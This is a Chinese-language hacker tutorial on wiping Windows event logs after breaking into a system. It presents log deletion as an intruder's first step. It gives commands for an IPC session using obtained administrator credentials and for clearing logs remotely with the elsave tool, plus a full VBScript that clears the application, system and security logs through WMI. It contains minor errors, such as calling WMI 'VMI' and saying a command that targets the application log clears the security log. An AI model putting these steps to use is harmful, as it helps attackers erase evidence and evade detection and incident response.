清除日志

1。清除日志

一个入侵系统成功后的黑客第一件事便是清除日志，如果以图形界面远程控制对方机器或是从终端登陆进入，删除日志不是一件困难的事，由于日志虽然也是作为一种服务运行，但不同于http,ftp这样的服务，可以在命令行下先停止，再删除，在m命令行下用net stop eventlog是不能停止的，所以有人认为在命令行下删除日志是很困难的，实际上不是这样，下面介绍几种方法: 
1.借助第三方工具：如小榕的elsave.exe远程清除system,applicaton,security的软件，使用方法很简单，首先利用获得的管理员账号与对方建立ipc会话，net use \\ip pass /user: user 
然后命令行下：elsave -s \\ip -l application -C，这样就删除了安全日志。 
其实利用这个软件还可以进行备份日志，只要加一个参数 -f filename就可以了，在此不再详述。 
2.利用脚本编程中的VMI，也可以实现删除日志，首先获得object对象，然后利用其clearEventLog() 方法删除日志。源代码： 
cleanevent.vbs 
strComputer = "." 
Set objWMIService = GetObject("winmgmts:" _ 
& "{impersonationLevel=impersonate,(Backup)}!\\" & _ 
strComputer & "\root\cimv2") 
dim mylogs(3) 
mylogs(1)="application" 
mylogs(2)="system" 
mylogs(3)="security" 
for Each logs in mylogs 
Set colLogFiles = objWMIService.ExecQuery _ 
("Select * from Win32_NTEventLogFile where LogFileName='"&logs&"'") 
For Each objLogfile in colLogFiles 
objLogFile.ClearEventLog() 
Next 
next 
在上面的代码中,建立一个数组,为application,security,system如果还有其他日志也可以加入数组。 
然后用一个for 循环,删除数组中的每一个元素,即各个日志.